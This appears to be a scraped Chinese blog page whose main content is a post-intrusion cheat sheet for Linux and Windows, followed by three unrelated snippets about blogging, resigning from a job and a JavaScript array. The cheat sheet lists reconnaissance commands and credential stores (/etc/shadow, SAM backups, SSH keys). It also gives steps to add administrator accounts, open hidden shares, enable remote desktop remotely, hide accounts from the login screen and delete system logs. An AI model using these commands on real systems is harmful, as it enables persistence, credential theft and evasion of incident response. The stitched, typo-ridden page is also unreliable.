lliunx
基本資訊收集windows• linux
• /etc/resolv.conf dns的篡改啊 劫持之類的
• /etc/passwd 但是很早liunx就不存在裡面了
• /etc/shadow 密碼在這裡
• whoami and who –a
• ifconfig -a, iptables -l -n, ifconfig –a, (netstat –rn 檢視當前系統的閘道器和路由設定)
• uname –a, ps aux
• dpkg -l| head 列出當前作業系統的所有安裝的軟體包
• windows• ipconfig /all , ipconfig /displadns, netstat -bnao , netstat –r
• net view , net view /domain
• net user /domain(域賬號的資訊), net user %username% /domain
• net accounts, net share
• net localgroup administrators username /add (把username加入administrators組裡面)
• net group
"domain controllers
" /domain (查詢"domain controllers"
裡面的主機)
• net share name$=c:\ /unlimited 開乙個共享
dns伺服器快取 上面
發現一被鎖定的域賬號 啟動他
getusername 檢視當前登入使用者
• wmic netlogin
getname,lastlogon 檢視使用者登陸記錄
• wmic process
getcaption, executablepath,commandline 檢視程序 輕鬆使用 還有點好用
• wmic process
where name=「calc.exe"
call terminate 結束一些程序
• wmic os get
name,servicepackmajorversion
• wmic product
getname,version
• wmic product
where name=「name」 call uninstall /nointeractive 刪掉軟體
• wmic share get /all收集• wmic /node:"
machinename
" path win32_terminalservicesetting where allowtsconnections="
0" call setallowtsconnections "
1「 開啟遠端桌面的
• wmic nteventlog get path,filename, writeable 檢視當前系統的日誌
收集敏感資料• 商業資訊
• 系統資訊
• linux
• /etc ;/usr/local/etc
• /etc/password ;/etc/shadow
• .ssh ;.gnupg 公私鑰
• the e-mail and data files
• 業務資料庫 ;身份認證伺服器資料庫
• /tmp
收集敏感資料
• windows
• sam 資料庫 ; 登錄檔檔案
• %systemroot%\repair\sam
• %systemroot%\system32\config\regback\sam
• 業務資料庫 ; 身份認證資料庫
• 臨時檔案目錄
隱藏痕跡
• 禁止在登陸介面顯示新建賬號
• reg add
"hkey_local_machine\software\microsoft\windows
nt\currentversion\winlogon\specialaccounts\userlist"
/v uname /t reg_dword /d 0
• del %windir%\*.log /a/s/q/f
• history
• 日誌
• auth.log /secure
• btmp /wtmp
• lastlog /faillog
• 其他日誌和 hids 等
怎樣快速拿到原創功能
但還是要特別感謝支援我的這37個人,因為你們的關注支援和點讚,我才能夠完成這小小的目標。自己的總結 無論如何最重要的堅持每天發布一篇中篇文章,必須是原創,而且不能斷更,不能兩天大魚三天曬網,覺得自己寫的不錯的可以 到朋友圈,刷一刷閱讀量和點讚數,另外還要和粉絲互動回覆訊息,自己用心經營,每天登陸兩三...
離職的藝術 拿到offer後如何談離職
如果找到覺得不錯的工作之後,接下來就可以提離職了。但是怎樣提離職,以及離職後還要做什麼,還是有很多注意事項的,在此和大家分享交流一下。遇到離職這種事情,以我的性格就會糾結幾天,想到老闆對我的信任和器重,不好意思直接和老闆說。但是既然已經決定了,遲早要說,那就盡早提,對老闆而言,他可以提交招聘,更快的...
拿到陣列資料後重新迴圈得到新陣列。
拿到的後台返回的陣列資料不是我需要的key,所以需要重新push新的陣列。後台的資料是這樣的 1 data 2,712 但是我需要的鍵不是這樣的,所以 1 function getnewdata data 3var arr 4 each data,function index,value 一定要重新...